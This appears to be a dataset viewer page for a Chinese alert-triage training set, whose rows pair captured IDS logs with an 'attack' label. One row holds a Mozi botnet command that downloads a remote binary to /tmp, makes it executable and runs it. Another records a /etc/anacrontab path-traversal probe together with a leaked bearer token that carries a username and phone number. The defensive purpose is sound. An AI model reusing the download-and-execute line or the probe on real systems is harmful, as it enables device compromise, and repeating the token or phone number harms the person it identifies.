Dataset Viewer
instruction
stringclasses 1
value | input
stringlengths 2.79k
12.9k
| output
stringclasses 2
values |
---|---|---|
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732722399", "rule_version_str": "3.0.1122.14572", "dip_group": "省公司", "nid": "", "sip_group": "", "type": "信息泄露", "_origin": {"write_date": 1732722399, "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.192.209", "site_app": "", "hit_end": 0, "uri": "/gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab", "dport": 473, "vuln_name": "敏感信息扫描(机器学习)", "rsp_status": 200, "code_language": "", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": 0, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "xff": "", "sip": "183.209.50.59", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "public_date": "2020-11-25 19:44:12", "sport": 36228}, "detail_info": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "file_md5": "", "rule_key": "webids", "connection": "keep-alive", "api": "zhny.hn.sgcc.com.cn/gateway/support/oss/getPublicInputStream", "first_access_time": "2024-11-27 23:46:39", "hazard_level": "2", "cookie": "sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%22191d59a55edcf2-05bd8f349acb414-26001e51-2073600-191d59a55eef89%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMTkxZDU5YTU1ZWRjZjItMDViZDhmMzQ5YWNiNDE0LTI2MDAxZTUxLTIwNzM2MDAtMTkxZDU5YTU1ZWVmODkifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%221935eec21f6967-011a48e8b28415-26001151-2073600-1935eec21f814be%22%7D; access_token=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJzeXNUeXBlIjoiWkhOWV9XRUIiLCJhdXRob3JpdGllc1NldCI6WyIwMjE4Il0sImZpcnN0TG9naW4iOmZhbHNlLCJsb2dpblR5cGUiOiJVU0VSTkFNRV9QV0QiLCJyb2xlcyI6IiIsInNvdXJjZSI6IjAxIiwicm9sZXNTZXQiOltdLCJlbmFibGVkIjoxLCJ0b2tlbktleSI6ImFzYWZhZmYuMjAyNDExMjcwMDUwMDQ3MDMiLCJleHBpcmVkIjowLCJsb2dpblRpbWUiOjE3MzI2Mzk4MDQ3MDMsInVzZXJTdGF0ZSI6MSwiaWQiOjIwMDMwMjk5LCJsb2NrZWQiOjAsImlhdCI6MTczMjYzOTgwNCwiZ3JvdXBDb2RlIjoiMDIxOCIsImlzU2VydmljZVN0YXRpb24iOjAsImlzQ2hpbGRVc2VyIjpmYWxzZSwiYXV0aG9yaXRpZXNHQSI6W3siYXV0aG9yaXR5IjoiMDIxOCJ9XSwicHJvdG9jb2xTaWduIjoiMSIsImF1dGhvcml0aWVzIjoiMDIxOCIsImhvbWVSb3V0ZXIiOiIvc3lzU2V0dGluZy9wZXJzb25hbENlbnRlciIsInBob25lIjoiMTgwNjE4NDM5MjciLCJ1c2VyVHlwZSI6MCwicHdkRXhwaXJhdGlvblRpbWUiOjE3MzczMDA1NTIwMDAsInVzZXJuYW1lIjoiYXNhZmFmZiJ9.OqXAUbMFHWOcZ56OrQVcgKnQOVjLMSv4hof5lH_JKvrmqCN8QJK0407KxtQJttJ4ZTKH7NBTk6vFNiNwVFRDLQ; uuid=20030299", "hazard_rating": "低危", "hit_field": "", "h_method": "GET", "sip_addr": "中国--江苏省--南京市", "x_forwarded_for": "", "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "device_ip": "172.31.191.7", "alarm_source": "天眼分析平台-8", "vuln_name": "敏感信息扫描(机器学习)", "alarm_sip": "172.31.192.209", "skyeye_index": "", "sip_ioc_dip": "17723502529a7dc0b6f137d092be2e56", "xff": "", "vuln_desc": "发现正在探测敏感信息文件,敏感的文件包括数据库文件、整站压缩文件、服务器或框架重要的配置文件、日志文件、压缩文件等。", "attack_chain": "0x01010000", "vuln_harm": "服务器敏感信息一旦泄露会导致攻击者获得重要信息,增加攻击成功率。", "sec-fetch-user": "?1", "dport": "473", "alert_devip": "172.31.191.8", "update_time": "1732722338", "code_language": "", "sec-ch-ua-mobile": "?0", "public_date": "2020-11-25 19:44:12", "skyeye_serial_num": "QbJK/jYtc", "sec-fetch-mode": "navigate", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "0", "h_proto_version": "HTTP/1.1", "uri": "/gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "rule_id": "0x10020b6a", "sec-ch-ua": "\"Chromium\";v=\"128\", \"Not;A=Brand\";v=\"24\", \"Google Chrome\";v=\"128\"", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "183.209.50.59", "host_md5": "8264552e08a54b43da4a95c89edc9c8b", "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36", "sec-fetch-dest": "document", "vlan_id": "", "vuln_type": "敏感信息扫描(机器学习)", "attack_type": "敏感信息/重要文件泄漏", "is_web_attack": "1", "dip": "172.31.192.209", "repeat_count": "1", "skyeye_type": "webids-webattack_dolog", "solution": "请确认服务器是否存在相关文件,如果存在,可考虑迁移或删除敏感信息文件。", "hit_start": "0", "filepath": "/etc/anacrontab", "skyeye_id": "", "payload": {"req_header": "R0VUIC9nYXRld2F5L3N1cHBvcnQvb3NzL2dldFB1YmxpY0lucHV0U3RyZWFtP2ZpbGVQYXRoPS9ldGMvYW5hY3JvbnRhYiBIVFRQLzEuMQ0KSG9zdDogemhueS5obi5zZ2NjLmNvbS5jbg0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0Kc2VjLWNoLXVhOiAiQ2hyb21pdW0iO3Y9IjEyOCIsICJOb3Q7QT1CcmFuZCI7dj0iMjQiLCAiR29vZ2xlIENocm9tZSI7dj0iMTI4Ig0Kc2VjLWNoLXVhLW1vYmlsZTogPzANCnNlYy1jaC11YS1wbGF0Zm9ybTogIldpbmRvd3MiDQpVcGdyYWRlLUluc2VjdXJlLVJlcXVlc3RzOiAxDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTI4LjAuMC4wIFNhZmFyaS81MzcuMzYNCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43DQpTZWMtRmV0Y2gtU2l0ZTogbm9uZQ0KU2VjLUZldGNoLU1vZGU6IG5hdmlnYXRlDQpTZWMtRmV0Y2gtVXNlcjogPzENClNlYy1GZXRjaC1EZXN0OiBkb2N1bWVudA0KQWNjZXB0LUxhbmd1YWdlOiB6aC1DTix6aDtxPTAuOSxlbjtxPTAuOA0KQ29va2llOiBzZW5zb3JzZGF0YTIwMTVqc3Nka2Nyb3NzPSU3QiUyMmRpc3RpbmN0X2lkJTIyJTNBJTIyMTkxZDU5YTU1ZWRjZjItMDViZDhmMzQ5YWNiNDE0LTI2MDAxZTUxLTIwNzM2MDAtMTkxZDU5YTU1ZWVmODklMjIlMkMlMjJmaXJzdF9pZCUyMiUzQSUyMiUyMiUyQyUyMnByb3BzJTIyJTNBJTdCJTIyJTI0bGF0ZXN0X3RyYWZmaWNfc291cmNlX3R5cGUlMjIlM0ElMjIlRTclOUIlQjQlRTYlOEUlQTUlRTYlQjUlODElRTklODclOEYlMjIlMkMlMjIlMjRsYXRlc3Rfc2VhcmNoX2tleXdvcmQlMjIlM0ElMjIlRTYlOUMlQUElRTUlOEYlOTYlRTUlODglQjAlRTUlODAlQkNfJUU3JTlCJUI0JUU2JThFJUE1JUU2JTg5JTkzJUU1JUJDJTgwJTIyJTJDJTIyJTI0bGF0ZXN0X3JlZmVycmVyJTIyJTNBJTIyJTIyJTJDJTIyJTI0bGF0ZXN0X3JlZmVycmVyX2hvc3QlMjIlM0ElMjIlMjIlN0QlMkMlMjJpZGVudGl0aWVzJTIyJTNBJTIyZXlJa2FXUmxiblJwZEhsZlkyOXZhMmxsWDJsa0lqb2lNVGt4WkRVNVlUVTFaV1JqWmpJdE1EVmlaRGhtTXpRNVlXTmlOREUwTFRJMk1EQXhaVFV4TFRJd056TTJNREF0TVRreFpEVTVZVFUxWldWbU9Ea2lmUSUzRCUzRCUyMiUyQyUyMmhpc3RvcnlfbG9naW5faWQlMjIlM0ElN0IlMjJuYW1lJTIyJTNBJTIyJTIyJTJDJTIydmFsdWUlMjIlM0ElMjIlMjIlN0QlMkMlMjIlMjRkZXZpY2VfaWQlMjIlM0ElMjIxOTM1ZWVjMjFmNjk2Ny0wMTFhNDhlOGIyODQxNS0yNjAwMTE1MS0yMDczNjAwLTE5MzVlZWMyMWY4MTRiZSUyMiU3RDsgYWNjZXNzX3Rva2VuPUJlYXJlciUyMGV5SmhiR2NpT2lKSVV6VXhNaUo5LmV5SnplWE5VZVhCbElqb2lXa2hPV1Y5WFJVSWlMQ0poZFhSb2IzSnBkR2xsYzFObGRDSTZXeUl3TWpFNElsMHNJbVpwY25OMFRHOW5hVzRpT21aaGJITmxMQ0pzYjJkcGJsUjVjR1VpT2lKVlUwVlNUa0ZOUlY5UVYwUWlMQ0p5YjJ4bGN5STZJaUlzSW5OdmRYSmpaU0k2SWpBeElpd2ljbTlzWlhOVFpYUWlPbHRkTENKbGJtRmliR1ZrSWpveExDSjBiMnRsYmt0bGVTSTZJbUZ6WVdaaFptWXVNakF5TkRFeE1qY3dNRFV3TURRM01ETWlMQ0psZUhCcGNtVmtJam93TENKc2IyZHBibFJwYldVaU9qRTNNekkyTXprNE1EUTNNRE1zSW5WelpYSlRkR0YwWlNJNk1Td2lhV1FpT2pJd01ETXdNams1TENKc2IyTnJaV1FpT2pBc0ltbGhkQ0k2TVRjek1qWXpPVGd3TkN3aVozSnZkWEJEYjJSbElqb2lNREl4T0NJc0ltbHpVMlZ5ZG1salpWTjBZWFJwYjI0aU9qQXNJbWx6UTJocGJHUlZjMlZ5SWpwbVlXeHpaU3dpWVhWMGFHOXlhWFJwWlhOSFFTSTZXM3NpWVhWMGFHOXlhWFI1SWpvaU1ESXhPQ0o5WFN3aWNISnZkRzlqYjJ4VGFXZHVJam9pTVNJc0ltRjFkR2h2Y21sMGFXVnpJam9pTURJeE9DSXNJbWh2YldWU2IzVjBaWElpT2lJdmMzbHpVMlYwZEdsdVp5OXdaWEp6YjI1aGJFTmxiblJsY2lJc0luQm9iMjVsSWpvaU1UZ3dOakU0TkRNNU1qY2lMQ0oxYzJWeVZIbHdaU0k2TUN3aWNIZGtSWGh3YVhKaGRHbHZibFJwYldVaU9qRTNNemN6TURBMU5USXdNREFzSW5WelpYSnVZVzFsSWpvaVlYTmhabUZtWmlKOS5PcVhBVWJNRkhXT2NaNTZPclFWY2dLblFPVmpMTVN2NGhvZjVsSF9KS3ZybXFDTjhRSkswNDA3S3h0UUp0dEo0WlRLSDdOQlRrNnZGTmlOd1ZGUkRMUTsgdXVpZD0yMDAzMDI5OQ0KDQo=", "req_body": "", "rsp_header": "SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54DQpEYXRlOiBXZWQsIDI3IE5vdiAyMDI0IDE1OjQ2OjM5IEdNVA0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uO2NoYXJzZXQ9VVRGLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMzcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClZhcnk6IE9yaWdpbg0KVmFyeTogQWNjZXNzLUNvbnRyb2wtUmVxdWVzdC1NZXRob2QNClZhcnk6IEFjY2Vzcy1Db250cm9sLVJlcXVlc3QtSGVhZGVycw0KWC1GcmFtZS1PcHRpb25zOiBBbGxvd0FsbA0KUmVmZXJyZXItUG9saWN5OiBuby1yZWZlcnJlcg0KWC1Eb3dubG9hZC1PcHRpb25zOiBub29wZW4NClN0cmljdC1UcmFuc3BvcnQtU2VjdXJpdHk6IG1heC1hZ2U9MTU1NTIwMDANCkNvbnRlbnQtU2VjdXJpdHktUG9saWN5OiBkZWZhdWx0LXNyYyAnc2VsZicgc3RhdGljNC5zZWd3YXkuY29tKOivpeWcsOWdgOaMiemcgOS/ruaUuSkgJ3Vuc2FmZS1pbmxpbmUnICd1bnNhZmUtZXZhbCcgYmxvYjogZGF0YTogOw0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KWC1YU1MtUHJvdGVjdGlvbjogMTttb2RlPWJsb2NrDQpYLVBlcm1pdHRlZC1Dcm9zcy1Eb21haW4tUG9saWNpZXM6IG5vbmUNCg0K", "rsp_body": "ewoJImNvZGUiOjUwMCwKCSJtZXNzYWdlIjoi6Z2e5rOV6Lev5b6E77yM6K+l5o6l5Y+j5LuF5o+Q5L6bcHVibGlj55uu5b2V5LiL5paH5Lu25rWB6I635Y+WIiwKCSJwYWdlIjpudWxsLAoJInJlc3VsdCI6bnVsbCwKCSJ0aW1lIjpudWxsCn0="}, "host": "zhny.hn.sgcc.com.cn", "host_state": "企图", "accept-language": "zh-CN,zh;q=0.9,en;q=0.8", "rsp_body": "{\n\t\"code\":500,\n\t\"message\":\"非法路径,该接口仅提供public目录下文件流获取\",\n\t\"page\":null,\n\t\"result\":null,\n\t\"time\":null\n}", "rule_desc": "网页漏洞利用", "proto": "http", "alarm_id": "20241127_f74d1c21cac0d5abacccd10a1b3ac7ca", "access_time": "2024-11-27 23:46:39", "attack_addr": "中国--江苏省--南京市(32.053245/118.766351)", "sec-fetch-site": "none", "type_chain": "16160000", "dip_addr": "中国--湖南省--长沙市", "rsp_status": "200", "branch_id": "QbJK/fzEi", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "upgrade-insecure-requests": "1", "sip": "183.209.50.59", "dimension": "3", "url_path": "/gateway/support/oss/getPublicInputStream", "src_mac": "00:24:ac:22:84:33", "file_name": "", "confidence": "高", "rsp_header": "HTTP/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 27 Nov 2024 15:46:39 GMT\r\nContent-Type: application/json;charset=UTF-8\r\nContent-Length: 137\r\nConnection: keep-alive\r\nVary: Origin\r\nVary: Access-Control-Request-Method\r\nVary: Access-Control-Request-Headers\r\nX-Frame-Options: AllowAll\r\nReferrer-Policy: no-referrer\r\nX-Download-Options: noopen\r\nStrict-Transport-Security: max-age=15552000\r\nContent-Security-Policy: default-src 'self' static4.segway.com(该地址按需修改) 'unsafe-inline' 'unsafe-eval' blob: data: ;\r\nX-Content-Type-Options: nosniff\r\nX-XSS-Protection: 1;mode=block\r\nX-Permitted-Cross-Domain-Policies: none\r\n\r\n", "super_type": "攻击利用", "serial_num": "QbJK/jYtc", "tcp_option": "", "req_header": "GET /gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab HTTP/1.1\r\nHost: zhny.hn.sgcc.com.cn\r\nConnection: keep-alive\r\nsec-ch-ua: \"Chromium\";v=\"128\", \"Not;A=Brand\";v=\"24\", \"Google Chrome\";v=\"128\"\r\nsec-ch-ua-mobile: ?0\r\nsec-ch-ua-platform: \"Windows\"\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nSec-Fetch-Site: none\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-User: ?1\r\nSec-Fetch-Dest: document\r\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\nCookie: sensorsdata2015jssdkcross=%7B%22distinct_id%22%3A%22191d59a55edcf2-05bd8f349acb414-26001e51-2073600-191d59a55eef89%22%2C%22first_id%22%3A%22%22%2C%22props%22%3A%7B%22%24latest_traffic_source_type%22%3A%22%E7%9B%B4%E6%8E%A5%E6%B5%81%E9%87%8F%22%2C%22%24latest_search_keyword%22%3A%22%E6%9C%AA%E5%8F%96%E5%88%B0%E5%80%BC_%E7%9B%B4%E6%8E%A5%E6%89%93%E5%BC%80%22%2C%22%24latest_referrer%22%3A%22%22%2C%22%24latest_referrer_host%22%3A%22%22%7D%2C%22identities%22%3A%22eyIkaWRlbnRpdHlfY29va2llX2lkIjoiMTkxZDU5YTU1ZWRjZjItMDViZDhmMzQ5YWNiNDE0LTI2MDAxZTUxLTIwNzM2MDAtMTkxZDU5YTU1ZWVmODkifQ%3D%3D%22%2C%22history_login_id%22%3A%7B%22name%22%3A%22%22%2C%22value%22%3A%22%22%7D%2C%22%24device_id%22%3A%221935eec21f6967-011a48e8b28415-26001151-2073600-1935eec21f814be%22%7D; access_token=Bearer%20eyJhbGciOiJIUzUxMiJ9.eyJzeXNUeXBlIjoiWkhOWV9XRUIiLCJhdXRob3JpdGllc1NldCI6WyIwMjE4Il0sImZpcnN0TG9naW4iOmZhbHNlLCJsb2dpblR5cGUiOiJVU0VSTkFNRV9QV0QiLCJyb2xlcyI6IiIsInNvdXJjZSI6IjAxIiwicm9sZXNTZXQiOltdLCJlbmFibGVkIjoxLCJ0b2tlbktleSI6ImFzYWZhZmYuMjAyNDExMjcwMDUwMDQ3MDMiLCJleHBpcmVkIjowLCJsb2dpblRpbWUiOjE3MzI2Mzk4MDQ3MDMsInVzZXJTdGF0ZSI6MSwiaWQiOjIwMDMwMjk5LCJsb2NrZWQiOjAsImlhdCI6MTczMjYzOTgwNCwiZ3JvdXBDb2RlIjoiMDIxOCIsImlzU2VydmljZVN0YXRpb24iOjAsImlzQ2hpbGRVc2VyIjpmYWxzZSwiYXV0aG9yaXRpZXNHQSI6W3siYXV0aG9yaXR5IjoiMDIxOCJ9XSwicHJvdG9jb2xTaWduIjoiMSIsImF1dGhvcml0aWVzIjoiMDIxOCIsImhvbWVSb3V0ZXIiOiIvc3lzU2V0dGluZy9wZXJzb25hbENlbnRlciIsInBob25lIjoiMTgwNjE4NDM5MjciLCJ1c2VyVHlwZSI6MCwicHdkRXhwaXJhdGlvblRpbWUiOjE3MzczMDA1NTIwMDAsInVzZXJuYW1lIjoiYXNhZmFmZiJ9.OqXAUbMFHWOcZ56OrQVcgKnQOVjLMSv4hof5lH_JKvrmqCN8QJK0407KxtQJttJ4ZTKH7NBTk6vFNiNwVFRDLQ; uuid=20030299\r\n\r\n", "req_body": "", "sec-ch-ua-platform": "\"Windows\"", "rule_state": "green", "asset_group": "省公司", "ioc": "268569450-敏感信息扫描(机器学习)", "rule_labels": "{}", "sport": "36228", "h_url": "/gateway/support/oss/getPublicInputStream?filePath=/etc/anacrontab"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732720892", "vlan_id": "", "vuln_type": "Shell命令执行(机器学习)", "rule_version_str": "3.0.1122.14572", "attack_type": "命令执行", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "命令执行", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732720892, "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "rule_version_str": "3.0.1122.14572", "hit_field": "", "dip": "172.31.193.243", "site_app": "", "hit_end": 0, "uri": "/boaform/admin/formLogin?username=ec8&psd=ec8", "dport": 80, "vuln_name": "Shell命令执行(机器学习)", "rsp_status": 0, "code_language": "", "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": 0, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "xff": "", "sip": "117.209.87.214", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "public_date": "2020-11-25 19:51:41", "sport": 34454}, "solution": "后端服务器语言中,严禁执行shell命令。", "hit_start": "0", "skyeye_id": "", "payload": {"req_header": "R0VUIC9ib2Fmb3JtL2FkbWluL2Zvcm1Mb2dpbj91c2VybmFtZT1lYzgmcHNkPWVjOCBIVFRQLzEuMA0KDQo=", "req_body": "MjBodHRwOi8vJXM6JWQvTW96aS5tJTIwLU8lMjAtPiUyMC90bXAvTmV0bGluay5tO2NobW9kJTIwNzc3JTIwL3RtcC9OZXRsaW5rLm07L3RtcC9OZXRsaW5rLm0md2FuaW5mPTFfSU5URVJORVRfUl9WSURfMTU0IEhUVFAvMS4wDQoNCg==", "rsp_header": "", "rsp_body": ""}, "detail_info": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "file_md5": "", "host": "", "host_state": "失败", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 23:21:32", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "", "rsp_body": "", "h_method": "GET", "sip_addr": "印度--卡纳塔克邦--班加罗尔", "x_forwarded_for": "", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "Shell命令执行(机器学习)", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "8b2b9022528f7952784134376ab9e5b5", "proto": "http", "xff": "", "alarm_id": "20241127_00cea921e5f095068f8fa263a9c84c80", "vuln_desc": "通过机器学习方式,检测到访问中存在shell命令执行攻击代码。", "attack_chain": "0x02020000", "access_time": "2024-11-27 23:21:32", "psd": "ec8", "attack_addr": "印度--卡纳塔克邦--班加罗尔(12.977788/77.607407)", "type_chain": "16090000", "vuln_harm": "shell命令执行攻击是危害极高的攻击形式,攻击成功可以造成服务器被控制。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732720871", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "初始访问:TA0001|利用面向公众的应用程序:T1190", "sip": "117.209.87.214", "public_date": "2020-11-25 19:51:41", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/boaform/admin/formLogin", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "高", "rsp_header": "", "super_type": "攻击利用", "site_app": "", "super_attack_chain": "0x02000000", "hit_end": "0", "h_proto_version": "HTTP/1.0\n\n", "serial_num": "QbJK/8ze/", "uri": "/boaform/admin/formLogin?username=ec8&psd=ec8", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020b6e", "req_header": "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0\r\n\r\n", "req_body": "20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Netlink.m;chmod%20777%20/tmp/Netlink.m;/tmp/Netlink.m&waninf=1_INTERNET_R_VID_154 HTTP/1.0\r\n\r\n", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "117.209.87.214", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268569454-Shell命令执行(机器学习)", "rule_labels": "{}", "host_md5": "d41d8cd98f00b204e9800998ecf8427e", "sport": "34454", "h_url": "/boaform/admin/formLogin?username=ec8&psd=ec8", "username": "ec8"} | 攻击 |
你是一名网络安全告警分析专家,请分析以下安全告警日志,重点分析payload字段,判断输入的告警日志是真实攻击还是误报。请直接回答"攻击"或"误报"。 | {"write_date": "1732720026", "vlan_id": "", "vuln_type": "发现黑客工具Masscan扫描行为", "rule_version_str": "3.0.1122.14572", "attack_type": "黑市工具", "dip_group": "未分配资产组", "is_web_attack": "1", "nid": "", "dip": "172.31.193.243", "sip_group": "", "repeat_count": "1", "type": "黑市工具", "skyeye_type": "webids-webattack_dolog", "_origin": {"write_date": 1732720026, "vuln_harm": "攻击者可通过Masscan快速获悉目标端口的状态,并针对开启的端口进行攻击。", "rule_version_str": "3.0.1122.14572", "hit_field": "req_header", "dip": "172.31.193.243", "site_app": "", "hit_end": 39, "uri": "/", "dport": 80, "vuln_name": "发现黑客工具Masscan扫描行为", "rsp_status": 0, "code_language": "", "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵", "hit_start": 19, "detail_info": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "xff": "", "sip": "79.110.62.153", "vuln_desc": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "public_date": "2023-03-17 16:10:28", "sport": 61000}, "solution": "建议检查自身应用服务器是否有高危端口对外开放,并根据实际情况应用防火墙测略进行IP封堵", "hit_start": "19", "skyeye_id": "", "payload": {"req_header": "R0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IGl2cmUtbWFzc2Nhbi8xLjMgaHR0cHM6Ly9naXRodWIuY29tL3JvYmVydGRhdmlkZ3JhaGFtLw0KQWNjZXB0OiAqLyoNCg0K", "req_body": "", "rsp_header": "", "rsp_body": ""}, "detail_info": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "file_md5": "", "host": "", "host_state": "失败", "rule_key": "webids", "api": "", "first_access_time": "2024-11-27 23:07:06", "hazard_level": "6", "hazard_rating": "高危", "hit_field": "req_header", "rsp_body": "", "h_method": "GET", "sip_addr": "美国--弗吉尼亚州--阿什本", "x_forwarded_for": "", "accept": "*/*", "device_ip": "172.31.191.58", "alarm_source": "天眼分析平台-57", "vuln_name": "发现黑客工具Masscan扫描行为", "alarm_sip": "172.31.193.243", "rule_desc": "网页漏洞利用", "skyeye_index": "", "sip_ioc_dip": "05e84db64fa1146b2d43bc83b3c8c5b7", "proto": "http", "xff": "", "alarm_id": "20241127_822406b6afaa6c98294a31aeb30f3195", "vuln_desc": "Masscan的扫描结果类似于Nmap(一个端口扫描器),在内部,它更像scanrand, unicornscan, and ZMap,采用了异步传输的方式。它和这些扫描器最主要的区别是,它比这些扫描器更快。而且,masscan更加灵活,它允许自定义任意的地址范和端口范围。", "attack_chain": "0x01010000", "access_time": "2024-11-27 23:07:06", "attack_addr": "美国--弗吉尼亚州--阿什本(39.043640/-77.487270)", "type_chain": "140E0000", "vuln_harm": "攻击者可通过Masscan快速获悉目标端口的状态,并针对开启的端口进行攻击。", "dip_addr": "局域网", "dport": "80", "alert_devip": "172.31.191.57", "rsp_status": "0", "update_time": "1732720005", "code_language": "", "branch_id": "QbJK/5PW2", "att_ck": "", "sip": "79.110.62.153", "public_date": "2023-03-17 16:10:28", "dimension": "3", "skyeye_serial_num": "QbJK/8ze/", "url_path": "/", "src_mac": "00:94:a1:5e:6e:87", "file_name": "", "confidence": "中", "rsp_header": "", "super_type": "恶意软件", "site_app": "", "super_attack_chain": "0x01000000", "hit_end": "39", "h_proto_version": "HTTP/1.0", "serial_num": "QbJK/8ze/", "uri": "/", "dst_mac": "00:24:ac:dd:9d:fb", "is_delete": "0", "tcp_option": "", "rule_id": "0x10020582", "req_header": "GET / HTTP/1.0\r\nUser-Agent: ivre-masscan/1.3 https://github.com/robertdavidgraham/\r\nAccept: */*\r\n\r\n", "req_body": "", "attack_org": "", "is_white": "0", "alarm_sample": "1", "attack_sip": "79.110.62.153", "rule_state": "green", "asset_group": "未分配资产组", "ioc": "268567938-发现黑客工具Masscan扫描行为", "rule_labels": "{\"0x10080e\": {\"parent_id\": \"0x100800\", \"type\": \"扫描器名称\", \"name\": \"Masscan\", \"parent_name\": \"Web漏洞扫描\"}, \"0x110A02\": {\"parent_name\": \"资产识别\", \"type\": \"模块名称\", \"name\": \"UA指纹识别\", \"parent_id\": \"0x110A00\", \"role\": \"C\", \"device\": \"Spider/Spider\", \"hw_type\": \"PC\"}}", "host_md5": "d41d8cd98f00b204e9800998ecf8427e", "sport": "61000", "h_url": "/", "user-agent": "ivre-masscan/1.3 https://github.com/robertdavidgraham/"} | 攻击 |
